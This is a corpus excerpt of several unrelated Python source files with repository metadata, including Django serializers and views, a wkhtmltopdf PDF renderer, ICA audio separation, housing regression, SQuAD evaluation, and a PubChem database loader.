        return self.entity_klass.from_orm({
            **entity_props,
            "id": ID(str(orm_entity.id)),
            "created_at": DateVO(orm_entity.created_at),
            "updated_at": DateVO(orm_entity.updated_at)
        })
| KCDichDaNgu/KC4.0_DichDaNgu_BackEnd | src/infrastructure/database/base_classes/mongodb/orm_mapper_base.py | orm_mapper_base.py | py | 1,853 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "typing.TypeVar",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "core.base_classes.entity.BaseEntityProps",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "typing.TypeVar",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "t... |
35243312943 | from rest_framework import serializers
from rest_framework.renderers import JSONRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from .models import Group, Facultie, Student, HistoryOfRating
class FacultiesSerializers(serializers.ModelSerializer):
    """Serializes Facultie records for list/detail endpoints."""
    class Meta:
        model = Facultie
        fields = ('id', 'name', 'dean', 'phone_number')
class GroupsSerializers(serializers.ModelSerializer):
    """Serializes Group records, flattening the related faculty's name."""
    faculty_name = serializers.SerializerMethodField('get_faculty_name')

    class Meta:
        model = Group
        fields = ('id', 'name', 'faculty_name', 'year')

    def get_faculty_name(self, Group):
        # NOTE(review): the parameter shadows the Group model class; it is
        # actually the group instance being serialized.
        faculty_name = Group.faculty.name
        return faculty_name
class StudentsSerializers(serializers.ModelSerializer):
    """Serializes Student records with the raw group foreign key."""
    class Meta:
        model = Student
        fields = ('id', 'name', 'email', 'rating', 'description', 'group')
class StudentProfileSerializers(serializers.ModelSerializer):
    """Student profile view: like StudentsSerializers but with the group name."""
    group_name = serializers.SerializerMethodField('get_group_name')

    class Meta:
        model = Student
        fields = ('id', 'name', 'email', 'rating', 'description', 'group_name')

    def get_group_name(self, Student):
        # NOTE(review): the parameter shadows the Student model class; it is
        # the student instance being serialized.
        group_name = Student.group.name
        return group_name
# class HistoryOfRatingSerializers(serializers.ModelSerializer):
# class Meta:
# model = HistoryOfRating
# fields = ('date_of_change', 'reason', 'rating_value', 'id_student')
class HistoryOfRatingSerializers(serializers.ModelSerializer):
    """Serializes rating-history entries; update() only touches rating_value."""
    class Meta:
        model = HistoryOfRating
        fields = ('date_of_change', 'reason', 'rating_value', 'id_student')

    def update(self, instance, validated_data):
        # Applies rating_value in memory only -- instance.save() is never
        # called here, so this method itself persists nothing.
        instance.rating_value = validated_data.get('rating_value', instance.rating_value)
        return instance
class ReasonsSerializer(APIView):
    """Read-only endpoint returning the static catalogue of rating reasons.

    Each entry pairs a human-readable reason (in Russian) with the signed
    rating delta it applies, e.g. '+100' or '-20'.
    """
    REASONS = {'reasons': [{'reason': 'Пользование мобильным устройством во время пары', 'rating': '-20'},
                           {'reason': 'Опоздание более чем на 0 милисекунд', 'rating': '-50'},
                           {'reason': 'Недостаточная вежливость по отношению к преподавателю и студентам',
                            'rating': '-10'},
                           {'reason': 'Невнимательное поведение на лекции', 'rating': '-20'},
                           {'reason': 'Некрасивый почерк у доски', 'rating': '-10'},
                           {'reason': 'Недостаточная активность на семинаре или практике', 'rating': '-30'},
                           {'reason': 'Плохое настроение', 'rating': '-5'},
                           {'reason': 'Оскорбление администрации', 'rating': '-100'},
                           {'reason': 'Немытая голова', 'rating': '-10'},
                           {'reason': 'Задержка в сдаче дз', 'rating': '-50'},
                           {'reason': 'Хорошие взаимоотношения с администратором', 'rating': '+100'},
                           {'reason': 'Своевременное выполнение дз', 'rating': '+10'},
                           {'reason': 'Активное поведение на семинаре', 'rating': '+20'},
                           {'reason': 'Подарок преподавателю', 'rating': '+50'},
                           {'reason': 'Участие в мероприятии', 'rating': '+30'},
                           {'reason': 'Ответ у доски', 'rating': '+5'},
                           {'reason': 'Отсутствие пропусков за месяц', 'rating': '+10'},
                           {'reason': 'Участие в олимпиаде', 'rating': '+20'},
                           {'reason': 'Отсутствие долгов на протяжении года', 'rating': '+50'},
                           {'reason': 'Отсутствие опозданий за неделю', 'rating': '+5'}]}

    def get(self, request):
        # Return the static catalogue as-is.
        return Response(self.REASONS)
| Ruslan1kHasanov/social_project | main/serializers.py | serializers.py | py | 4,354 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.serializers.ModelSerializer",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.serializers",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "models.Facultie",
"line_number": 11,
"usage_type": "name"
},
... |
import logging
import os
import subprocess

from django.conf import settings
from django.db.models import Q
from django.http import HttpResponse
from django.utils.safestring import mark_safe

from cvAppMain.helpers import get_cv_url
from cvAppMain.models import GeneratedPDF
logger = logging.getLogger('django')
def make_context(process, language):
    """Build the template context used when rendering a CV.

    Includes the process itself plus every text in the requested language
    (or with no language at all), keyed by its text-type codename and
    marked safe for direct HTML rendering.
    """
    context = {"process": process}
    matching_texts = process.texts.filter(Q(language=language) | Q(language__isnull=True))
    for text in matching_texts:
        context[text.text_type.codename] = mark_safe(text.text)
    return context
def get_pdf(process, language):
    """Return a cached PDF response for this process/language, or render one."""
    cached = process.generatedpdf_set.filter(language=language).first()
    if cached is None:
        return render_to_pdf(process, language)
    return cached.as_response()
def render_to_pdf(process, language):
    """Render the CV page to a PDF with wkhtmltopdf and cache it in the DB.

    Requires the PROTOCOL and HOST settings to be set, because wkhtmltopdf
    fetches the HTML version of the CV over HTTP.  Returns the stored PDF
    as an HTTP response, or a plain error response when caching fails.
    """
    temp_pdf = f'pdfs/{process.codename}_{language.lang}.pdf'
    url = f'{settings.PROTOCOL}{settings.HOST}{get_cv_url(process.codename, language, "html")}'
    # Fix: invoke wkhtmltopdf without a shell.  The old os.system(f"...")
    # call interpolated codename/URL into a shell string, which is both
    # quoting-fragile and shell-injectable.
    command = ['wkhtmltopdf', url, temp_pdf]
    try:
        logger.info(f"Rendering PDF to:\n{temp_pdf}\nwith command:\n{' '.join(command)}\n")
        subprocess.run(command, check=True)
    except Exception as e:
        logger.error("Error while generating PDF: " + str(e))
    try:
        saved_pdf = GeneratedPDF.objects.create(process=process, language=language, pdf=temp_pdf)
        return saved_pdf.as_response()
    except Exception as e:
        logger.error("Error while saving and returning PDF: " + str(e))
        return HttpResponse('Something went wrong while generating PDF! Sorry!')
| EricFelixLuther/cvApp | cv_App/cvAppMain/pdf_logic.py | pdf_logic.py | py | 1,819 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "django.db.models.Q",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "django.db.models.Q",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "django.utils.... |
4254437724 | from sklearn.decomposition import FastICA
import numpy
import matplotlib.pyplot as plt
import time
from scipy.io import wavfile
from Processor import Processor
from sklearn import preprocessing
class ICA:
    """Blind source separation of a multi-channel recording via FastICA."""

    def __init__(self, mixed_sig, no_of_components):
        self.mixed_signal = mixed_sig            # (samples, channels) matrix
        self.num_components = no_of_components   # number of sources to recover

    def train(self, opt, proc):
        """Fit FastICA and return (sources, mixing matrix, remixed signal).

        opt selects a variant: 1 default, 2 whitening off, 3 'exp' contrast
        function, 4 'cube' contrast function, 5 scale/center the input first.
        """
        print("Training ICA...")
        time_start = time.time()
        # whitening necessary
        if opt == 2:
            ica = FastICA(n_components=self.num_components, whiten=False)
        elif opt == 3:
            ica = FastICA(n_components=self.num_components, fun='exp')
        elif opt == 4:
            ica = FastICA(n_components=self.num_components, fun='cube')
        elif opt == 5:
            self.mixed_signal = preprocessing.scale(self.mixed_signal)
            ica = FastICA(n_components=self.num_components)
        else:
            ica = FastICA(n_components=self.num_components)
        reconstruct_signal = ica.fit_transform(self.mixed_signal)
        mixing_matrix = ica.mixing_
        time_stop = time.time() - time_start
        print("Training Complete under {} seconds".format(time_stop))
        # Sanity check: sources @ mixing.T must reproduce the input (the
        # mean term only exists when the data was centered, i.e. opt != 2).
        if opt == 2:
            assert numpy.allclose(self.mixed_signal, numpy.dot(reconstruct_signal, mixing_matrix.T))
            remixed_mat = numpy.dot(reconstruct_signal, mixing_matrix.T)
        else:
            assert numpy.allclose(self.mixed_signal, numpy.dot(reconstruct_signal, mixing_matrix.T) + ica.mean_)
            remixed_mat = numpy.dot(reconstruct_signal, mixing_matrix.T) + ica.mean_
        # Report the squared residual between each remixed channel and the input.
        for channel in range(len(remixed_mat.T)):
            diff = remixed_mat.T[channel] - self.mixed_signal.T[channel]
            residual = sum(i ** 2 for i in diff)
            print("Residual value: {}".format(residual))
        return reconstruct_signal, mixing_matrix, remixed_mat

    def create_audio(self, reconstructed_mat, s_hat_names, remixed_mat, recon_names, rates):
        """Write each recovered source and remixed channel to a WAV file."""
        print("Creating recovered audio...")
        # Fix: iterate over the s_hat_names parameter.  The old code looped
        # over the module-level `s_hat` list, silently ignoring the argument.
        for count in range(len(s_hat_names)):
            wavfile.write(s_hat_names[count], rates[count], reconstructed_mat.T[count])
            wavfile.write(recon_names[count], rates[count], numpy.asarray(remixed_mat.T[count], dtype=numpy.int16))

    def plot_audio(self, mixed_sig, recovered_sig):
        """Plot the mixed observations above the ICA-recovered signals."""
        print("Plotting graphs...")
        models = [mixed_sig, recovered_sig]
        names = ['Observations (mixed signal)',
                 'ICA recovered signals']
        colors = ['red', 'steelblue', 'orange', 'green', 'brown']
        plt.figure()
        for ii, (model, name) in enumerate(zip(models, names), 1):
            plt.subplot(2, 1, ii)
            plt.title(name)
            for sig, color in zip(model.T, colors):
                plt.plot(sig, color=color)
        plt.subplots_adjust(0.09, 0.04, 0.94, 0.94, 0.26, 0.46)
        plt.show()
if __name__ == '__main__':
    # Five-microphone demo: mix, separate, write WAV outputs, plot results.
    audios = ['mic1.wav', 'mic2.wav', 'mic3.wav', 'mic4.wav', 'mic5.wav']
    s_hat = ['shat1.wav', 'shat2.wav', 'shat3.wav', 'shat4.wav', 'shat5.wav']
    recon = ['recon1.wav', 'recon2.wav', 'recon3.wav', 'recon4.wav', 'recon5.wav']
    processor = Processor(audios)
    processor.generate_wav_data()
    # Options: 1: default, 2: whitening off, 3: exp function, 4: cube function, 5: centering
    option = 1
    ica_ = ICA(processor.mixed_signal, 5)
    recon_matrix, mixing_matrix, remixed = ica_.train(option, processor.rates)
    ica_.create_audio(recon_matrix, s_hat, remixed, recon, processor.rates)
    ica_.plot_audio(processor.mixed_signal, recon_matrix)
| sarmientoj24/ICA | ICA.py | ICA.py | py | 3,910 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "time.time",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sklearn.decomposition.FastICA",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sklearn.decomposition.FastICA",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": ... |
40837765126 | import os
import tarfile
from six.moves import urllib
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LinearRegression
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import mean_squared_error
# sns.set()
DOWNLOAD_ROOT = "https://raw.githubusercontent.com/ageron/handson-ml2/master/"
HOUSING_PATH = os.path.join("data", "housing")
HOUSING_URL = DOWNLOAD_ROOT + "datasets/housing/housing.tgz"
def fetch_housing_data(housing_url=HOUSING_URL, housing_path=HOUSING_PATH):
    """Download housing.tgz from *housing_url* and extract it into *housing_path*.

    Creates the target directory if it does not exist yet.
    """
    # exist_ok replaces the separate isdir check.
    os.makedirs(housing_path, exist_ok=True)
    tgz_path = os.path.join(housing_path, "housing.tgz")
    urllib.request.urlretrieve(housing_url, tgz_path)
    # Context manager closes the archive even if extraction raises
    # (the old open/extractall/close leaked the handle on error).
    with tarfile.open(tgz_path) as housing_tgz:
        housing_tgz.extractall(path=housing_path)
def load_housing_data(housing_path=HOUSING_PATH):
    """Read housing.csv from *housing_path* into a pandas DataFrame."""
    return pd.read_csv(os.path.join(housing_path, "housing.csv"))
def get_data_info():
    """Print schema info for the module-level *housing* frame; return describe().

    NOTE(review): relies on the global `housing` assigned later at module
    level, so it is only valid after load_housing_data() has run.  Also,
    DataFrame.info() prints and returns None, so this prints 'None' too.
    """
    print(housing.info())
    data_describe = housing.describe()
    return data_describe
# --- script body: download data, engineer features, build the X/y split ---
fetch_housing_data()
housing = load_housing_data()
data_describe = get_data_info()

# One-hot encode categorical columns so everything below is numeric.
housing = pd.get_dummies(housing)

plt.figure(1)
sns.histplot(data=housing)
plt.figure(2)
sns.scatterplot(data=housing, x='longitude', y='latitude', hue='median_house_value', s=1)
corr_matrix = housing.corr()

# Derived ratio features.
housing["rooms_per_household"] = housing["total_rooms"]/housing["households"]
housing["bedrooms_per_room"] = housing["total_bedrooms"]/housing["total_rooms"]
housing["population_per_household"]=housing["population"]/housing["households"]

# Move the target column to the end so the .loc slice below excludes it.
target = housing.pop('median_house_value')
housing['median_house_value'] = target
housing = housing.dropna()
corr_matrix_2 = housing.corr()

X = housing.loc[:, 'longitude':'population_per_household']
y = housing['median_house_value']
X_train, X_test, y_train, y_test = train_test_split(X, y)
def evaluate_model(estimator):
    """Fit *estimator* behind a StandardScaler and print train/test metrics.

    NOTE(review): uses the module-level X_train/X_test/y_train/y_test splits.
    """
    model = make_pipeline(StandardScaler(), estimator)
    model.fit(X_train, y_train)
    y_predicted = model.predict(X_train)
    print('\nAccuracy on train set:', model.score(X_train, y_train))
    # np.sqrt of the MSE -- this is actually the RMSE, despite the label.
    mse = np.sqrt(mean_squared_error(y_train, y_predicted))
    print('Mean squared error:', mse)
    print('Accuracy on test set:', model.score(X_test, y_test))
# Compare a linear baseline against a random forest, then show all figures.
estimators = [LinearRegression(), RandomForestRegressor()]
for i in estimators:
    evaluate_model(i)
plt.show()
| lewiis252/pythonProject4 | cal_hous.py | cal_hous.py | py | 2,609 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.isdir",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
25587181346 | import torch
from tqdm import tqdm, trange
from utils_squad_evaluate import EVAL_OPTS, main as evaluate_on_squad, plot_pr_curve
from utils_squad import (read_squad_examples, convert_examples_to_features,
RawResult, write_predictions,
RawResultExtended, write_predictions_extended)
def to_list(tensor):
    """Return the tensor's values as (possibly nested) Python lists,
    detached from the graph and moved to the CPU first."""
    detached = tensor.detach()
    on_cpu = detached.cpu()
    return on_cpu.tolist()
def evaluate(model, validation_dataloader, features_val, examples_val, tokenizer, predict_file, len_val, batch_size, device):
    """Run SQuAD evaluation: predict answer spans, write prediction files,
    and score them with the official evaluation script.

    Returns the metrics dict from evaluate_on_squad.
    NOTE(review): `tokenizer` is accepted but never used in this body.
    """
    print("***** Running evaluation *****")
    print(" Num examples = %d" % len_val)
    print(" Batch size = %d" % batch_size)
    all_results = []
    for batch in tqdm(validation_dataloader, desc="Evaluating", miniters=100, mininterval=5.0):
        model.eval()
        batch = tuple(t.to(device) for t in batch)
        with torch.no_grad():
            inputs = {'input_ids': batch[0],
                      'attention_mask': batch[1],
                      'token_type_ids': batch[2]
                      }
            example_indices = batch[3]
            outputs = model(**inputs)
        for i, example_index in enumerate(example_indices):
            # Map each prediction back to its feature via the batch's index tensor.
            eval_feature = features_val[example_index.item()]
            unique_id = int(eval_feature.unique_id)
            result = RawResult(unique_id = unique_id,
                               start_logits = to_list(outputs[0][i]),
                               end_logits = to_list(outputs[1][i]))
            all_results.append(result)
    # Compute predictions
    # NOTE(review): hard-coded absolute paths -- a writable /predictions
    # directory must exist; `output_dir` below is never used.
    output_prediction_file = "/predictions/predictions.json"
    output_nbest_file = "/predictions/nbest_predictions.json"
    output_null_log_odds_file = "/predictions/null_odds.json"
    output_dir = "/predictions/predict_results"
    write_predictions(examples_val, features_val, all_results, 10,
                      30, True, output_prediction_file,
                      output_nbest_file, output_null_log_odds_file, False,
                      True, 0.0)
    # Evaluate with the official SQuAD script
    evaluate_options = EVAL_OPTS(data_file=predict_file,
                                 pred_file=output_prediction_file,
                                 na_prob_file=output_null_log_odds_file,
                                 out_image_dir=None)
    results = evaluate_on_squad(evaluate_options)
    return results
{
"api_name": "tqdm.tqdm",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "torch.no_grad",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "utils_squad.RawResult",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "utils_squad.write_predi... |
25282953204 | # -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
def main():
    """Fetch a GitHub profile page and print the response plus all anchor tags."""
    target_url = 'https://github.com/librariapj'
    # Retrieve the page over HTTP.
    response = requests.get(target_url)
    print(response)
    # Parse the HTML and dump every <a> element.
    parsed_page = BeautifulSoup(response.content, 'html.parser')
    print(parsed_page.find_all("a"))


if __name__ == "__main__":
    main()
| librariapj/SampleProject | src/hello.py | hello.py | py | 535 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 14,
"usage_type": "call"
}
] |
13861490174 | from django.core.paginator import Paginator
import plotly.graph_objects as go
from django.shortcuts import render
from django.contrib import messages
import matplotlib.dates as mdates
from .api_calls import (
fetch_coins,
fetch_market_charts,
fetch_coin_details,
fetch_order_book,
fetch_coin_history,
API_COINCAP_URL,
API_BASE_URL,
API_BASE_URL_CHARTS,
API_BASE_URL_DETAILS,
API_ORDER_BOOK_URL,
params,
chart_params,
order_params
)
import matplotlib
matplotlib.use('Agg')
from dateutil.parser import parse as parse_date
import matplotlib.pyplot as plt
from io import BytesIO
import base64
from datetime import datetime
import re
import datetime
def crypto(request):
    """List coins ten per page, or show an error when the API limit is hit."""
    coin_data = fetch_coins(API_BASE_URL, params)

    # Treat both a failed fetch and an explicit 429 payload as rate limiting.
    if coin_data is None:
        messages.error(request, 'The limit for fetch requests has been reached. Please try again later.')
        return render(request, 'crypto_pulse/crypto.html')
    if 'error' in coin_data and coin_data['error']['code'] == 429:
        messages.error(request, 'The limit for fetch requests has been reached. Please try again later.')
        return render(request, 'crypto_pulse/crypto.html')

    # Ten coins per page.
    paginator = Paginator(coin_data, 10)
    page_obj = paginator.get_page(request.GET.get('page'))

    # Keep the raw API payload around for the chart/detail views.
    request.session['coin_data'] = coin_data

    # Project only the fields the template needs.
    coins = [
        {
            'name': entry.get('name'),
            'symbol': entry.get('symbol'),
            'image': entry.get('image'),
            'market_cap': entry.get('market_cap'),
            'daily_price_change': entry.get('price_change_percentage_24h'),
            'daily_volume': entry.get('total_volume'),
            'current_price': entry.get('current_price'),
        }
        for entry in page_obj
    ]
    return render(request, 'crypto_pulse/crypto.html', {'page_obj': page_obj, 'coins': coins})
def coin_chart(request, coin_symbol):
    """Render a 3-month candlestick chart plus order book for one trading pair."""
    # Format symbol into a Binance pair, e.g. "btc" -> "BTCUSDT".
    coin_symbol = coin_symbol.upper() + 'USDT'
    if coin_symbol == 'USDTUSDT':
        # USDT itself has no USDT pair; fall back to BUSD/USDT.
        coin_symbol = 'BUSDUSDT'
    title_coin_symbol = coin_symbol.replace('USDT', '/USDT')
    # Fetch data
    candles_data = fetch_market_charts(API_BASE_URL_CHARTS, coin_symbol=coin_symbol, params=chart_params)
    orderbook_data = fetch_order_book(API_ORDER_BOOK_URL, coin_symbol=coin_symbol, params=order_params)
    # Check if data was successfully fetched
    # NOTE(review): `and` lets a single failed fetch through, which would
    # raise on the subscripts below -- confirm whether `or` was intended.
    if candles_data is None and orderbook_data is None:
        messages.error(request, 'Failed to fetch candlestick data. Please try again.')
        return render(request, 'crypto_pulse/coin_chart.html')
    # Parse the orderbook data from Binance API
    bids_data = orderbook_data['bids']
    asks_data = orderbook_data['asks']
    # Parse the data from the Binance API to create the candlestick chart
    # (kline rows start with [open time, open, high, low, close, ...]).
    timestamps = [candle[0] for candle in candles_data]
    open_prices = [float(candle[1]) for candle in candles_data]
    high_prices = [float(candle[2]) for candle in candles_data]
    low_prices = [float(candle[3]) for candle in candles_data]
    close_prices = [float(candle[4]) for candle in candles_data]
    # Calculate the date range for the last 3 months
    today = datetime.date.today()
    three_months_ago = today - datetime.timedelta(days=90)
    # Filter the data to show only the last 3 months
    # (timestamps are milliseconds, hence the / 1000).
    filtered_data = [(timestamp, open_price, high_price, low_price, close_price)
                     for timestamp, open_price, high_price, low_price, close_price in zip(timestamps, open_prices, high_prices, low_prices, close_prices)
                     if datetime.datetime.fromtimestamp(timestamp / 1000).date() >= three_months_ago]
    # Create the candlestick chart
    fig = go.Figure(data=[go.Candlestick(x=[candle[0] for candle in filtered_data],
                                         open=[candle[1] for candle in filtered_data],
                                         high=[candle[2] for candle in filtered_data],
                                         low=[candle[3] for candle in filtered_data],
                                         close=[candle[4] for candle in filtered_data])])
    # Customize the chart layout
    fig.update_layout(
        xaxis=dict(
            type='date',  # Set the x-axis type to 'date'
            range=[three_months_ago, today + datetime.timedelta(days=1)],  # Set the x-axis range to include an extra day
            gridcolor='rgba(255, 255, 255, 0.2)',  # Set the grid color with transparency
            showgrid=True,  # Show the grid lines
        ),
        yaxis=dict(
            gridcolor='rgba(255, 255, 255, 0.2)',  # Set the grid color with transparency for the y-axis
            showgrid=True,  # Show the grid lines for the y-axis
        ),
        plot_bgcolor='rgba(0, 0, 0, 0)',  # Set the plot area background to transparent
        paper_bgcolor='rgba(0, 0, 0, 0)',  # Set the entire chart background to transparent
        font=dict(color='white'),  # Set the font color for the labels and legend to white
        title=dict(text=f'{title_coin_symbol}',  # Set the title of the chart
                   x=0.5,  # Set the title position to the center of the chart
                   y=0.95,  # Set the title position relative to the y-axis
                   font=dict(size=24)  # Set the font size of the title
                   ),
        xaxis_rangeslider_visible=False
    )
    # Convert the chart to JSON to pass it to the template
    chart_json = fig.to_json()
    # Get coin data from the session
    coin_data = request.session.get('coin_data', [])
    coin_info = {}
    for coin in coin_data:
        # Strip the quote currency to match the session payload's symbol.
        real_coin_symbol = coin_symbol.replace('USDT', '').lower()
        if coin['symbol'] == real_coin_symbol:
            coin_info = {
                'name': coin.get('name'),
                'symbol': real_coin_symbol,
                'current_price': coin.get('current_price'),
                'daily_price_change': coin.get('price_change_percentage_24h'),
                'daily_volume': coin.get('total_volume'),
                'market_cap': coin.get('market_cap'),
            }
            break
    # Pass the selected coin's data and chart JSON to the template
    return render(request, 'crypto_pulse/coin_chart.html', {'chart_json': chart_json,
                                                            'coin_info': coin_info,
                                                            'bids': bids_data,
                                                            'asks': asks_data})
def coin_details(request, coin_name):
    """Show a coin's description and an inline price-history chart.

    The incoming display name is normalised to the provider's slug first
    (the '%20' variants come from URL-encoded names).
    """
    # Fetch data for description
    if coin_name.lower() == 'xrp':
        coin_name = 'ripple'
    if coin_name.lower() == 'binance usd':
        coin_name = 'binance-usd'
    if coin_name.lower() == 'bnb':
        coin_name = 'busd'
    if coin_name.lower() == 'usd coin' or coin_name.lower() == 'usd%20coin':
        coin_name = 'usd-coin'
    if coin_name.lower() == 'wrapped bitcoin' or coin_name.lower() == 'wrapped%20bitcoin':
        coin_name = 'wrapped-bitcoin'
    if coin_name.lower() == 'shiba inu' or coin_name.lower() == 'shiba%20inu':
        coin_name = 'shiba-inu'
    if coin_name.lower() == 'bitcoin cash' or coin_name.lower() == 'bitcoin%20cash':
        coin_name = 'bitcoin-cash'
    if coin_name.lower() == 'ethereum classic' or coin_name.lower() == 'ethereum%20classic':
        coin_name = 'ethereum-classic'
    if coin_name.lower() == 'cosmos hub' or coin_name.lower() == 'cosmos%20hub':
        coin_name = 'cosmos-hub'
    # NOTE(review): the local `coin_details` shadows this view function's name.
    coin_details = fetch_coin_details(API_BASE_URL_DETAILS, coin_name=coin_name)
    # The history API uses 'xrp' where the details API uses 'ripple', so swap back.
    if coin_name.lower() == 'ripple':
        coin_name = 'xrp'
    coin_history = fetch_coin_history(API_COINCAP_URL, coin_name=coin_name)
    if coin_history is None:
        messages.error(request, 'Failed to fetch data. Please try again.')
        return render(request, 'crypto_pulse/coin_chart.html')
    data = coin_history['data']
    # Parse coin history (duplicate assignment kept as-is)
    data = coin_history['data']
    prices = []
    dates = []
    for data_point in data:
        price = data_point['priceUsd']
        date = data_point['date']
        prices.append(float(price))
        dates.append(date)
    # Convert formatted_dates to datetime objects
    formatted_dates = [parse_date(date_string) for date_string in dates]
    # Clear plots (matplotlib keeps global state between requests)
    plt.clf()
    plt.figure(figsize=(11, 4))  # Adjust the height to 4
    # Creating line chart
    plt.plot(formatted_dates, prices, linewidth=2)
    # Plot info and style
    plt.style.use('_mpl-gallery')
    plt.xlabel('', color='white')  # Increase font size to 12
    plt.ylabel('', color='white')  # Increase font size to 12
    plt.title(f'{coin_name} price', color='white')  # Increase font size to 16
    plt.tight_layout()
    # Remove the grid from both axes
    plt.grid(False)
    # Style tick labels on both axes to have a white font color and increase font size to 10
    plt.tick_params(axis='x', colors='white')
    plt.tick_params(axis='y', colors='white', labelsize=8)
    # Configure x-axis tick marks to display fewer dates
    locator = mdates.AutoDateLocator(minticks=5, maxticks=9)
    formatter = mdates.ConciseDateFormatter(locator)
    plt.gca().xaxis.set_major_locator(locator)
    plt.gca().xaxis.set_major_formatter(formatter)
    # Convert the plot to an image (base64 PNG so it can be inlined in HTML)
    buffer = BytesIO()
    plt.savefig(buffer, format='png', transparent=True)
    buffer.seek(0)
    line_chart = base64.b64encode(buffer.getvalue()).decode('utf-8')
    buffer.close()
    # Check if data was successfully fetched
    if coin_details is None:
        messages.error(request, 'Failed to fetch data. Please try again.')
        return render(request, 'crypto_pulse/coin_chart.html')
    # Create a dictionary to store descriptions
    description = coin_details['description']['en']
    name = coin_details['name']
    symbol = coin_details['symbol'].upper()
    # Clean the description by removing URLs and links
    cleaned_description = description.replace('<a href="', '')
    url_pattern = re.compile(r'http[s]?://\S+|www\.\S+')
    cleaned_description = re.sub(url_pattern, '', cleaned_description)
    context = {
        'description': cleaned_description,
        'name': name,
        'symbol': symbol,
        'line_chart': line_chart
    }
    return render(request, 'crypto_pulse/coin_details.html', context)
{
"api_name": "matplotlib.use",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "api_calls.fetch_coins",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "api_calls.API_BASE_URL",
"line_number": 34,
"usage_type": "argument"
},
{
"api_name": "api_c... |
28671672532 | import pandas as pd
import numpy
import os
import sys
import csv
import logging
import psycopg2
from psycopg2.extensions import register_adapter, AsIs
from cloudharness import applications
def addapt_numpy_int64(numpy_int64):
    """Adapter so psycopg2 can send numpy.int64 values as plain SQL integers."""
    raw_value = numpy_int64
    return AsIs(raw_value)
# Teach psycopg2 how to serialise numpy.int64 values (pandas emits these).
register_adapter(numpy.int64, addapt_numpy_int64)
# Build the Postgres connection string from the cloudharness app configuration.
app = applications.get_configuration("pub-chem-index")
conn_string = f"postgres://{app.db_name}:{app.harness.database.postgres.ports[0]['port']}/asu?user={app.harness.database.user}&password={app.harness.database.get('pass')}"
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
NUM_PROCESSES = 2
NUM_QUEUE_ITEMS = 20
#
# WARNING!!! use head command on files for debugging
# head -n 500000 CID-SMILES > CID-SMILES-head
#
# "https://ftp.ncbi.nlm.nih.gov/pubchem/Compound/Extras/CID-Synonym-unfiltered.gz"
# Maps each PubChem extras file name to the column names of its target table.
added_col_dic = {
    "CID-InChI-Key": ["CID", "InChI", "Key"],
    "CID-Mass": ["CID", "Molecule", "Mass1", "Mass2"],
    "CID-PMID": ["CID", "PMID"],
    "CID-Parent": ["CID", "Parent"],
    "CID-Patent": ["CID", "Patent"],
    "CID-SID": ["CID", "SID"],
    "CID-MeSH": ["CID", "MeSH"],
    "CID-SMILES": ["CID", "SMILES"],
    "CID-Synonym-filtered": ["CID", "Synonym"],
    "CID-Synonym-unfiltered": ["CID", "Synonym"],
    "CID-Title": ["CID", "Title"],
    "CID-IUPAC": ["CID", "IUPAC"],
    "CID-Component": ["CID", "component"],
}
# Tables that also get a trigram GIN index for substring search.
gin_indexes_tables = ['CID-Title', 'CID-MeSH', 'CID-IUPAC', 'CID-InChI-Key', 'CID-Synonym-filtered']
def change_permissions_recursive(path, mode):
    """Recursively apply ``mode`` to every exported file under ``path``.

    Walks the tree bottom-up and chmods only files whose *name* starts with
    ``export-``; directories and other files are left untouched.

    :param path: Root directory to walk.
    :param mode: Permission bits to apply (e.g. ``0o644``).
    """
    for root, dirs, files in os.walk(path, topdown=False):
        for name in files:
            # Match on the basename: the original code compared the *full*
            # joined path against the "export-" prefix, which never matched,
            # so no file was ever chmodded.
            if name.startswith("export-"):
                os.chmod(os.path.join(root, name), mode)
def execute_sql(conn, command):
    """Run a single SQL ``command`` on ``conn`` and commit it immediately."""
    cur = conn.cursor()
    with cur:
        logging.info(f"Execute {command}")
        cur.execute(command)
        conn.commit()
def create_table(conn, table_name):
    """Drop and recreate the table backing ``table_name``.

    Column names come from ``added_col_dic``; ``CID`` becomes an
    ``INTEGER NOT NULL`` column and every other column a ``VARCHAR``.

    :param conn: Open database connection.
    :param table_name: Source file name (e.g. ``CID-SMILES``); dashes are
        mapped to underscores for the SQL table name.
    """
    column_names = [c.upper() for c in added_col_dic[table_name]]
    table_name = table_name.replace("-", "_").upper()
    # Build the column definition list with join() instead of appending and
    # then slicing off a trailing comma.
    str_column_names = ",".join(
        f"{c} INTEGER NOT NULL" if c == "CID" else f"{c} VARCHAR"
        for c in column_names
    )
    sql_drop_table = f"DROP TABLE IF EXISTS {table_name}"
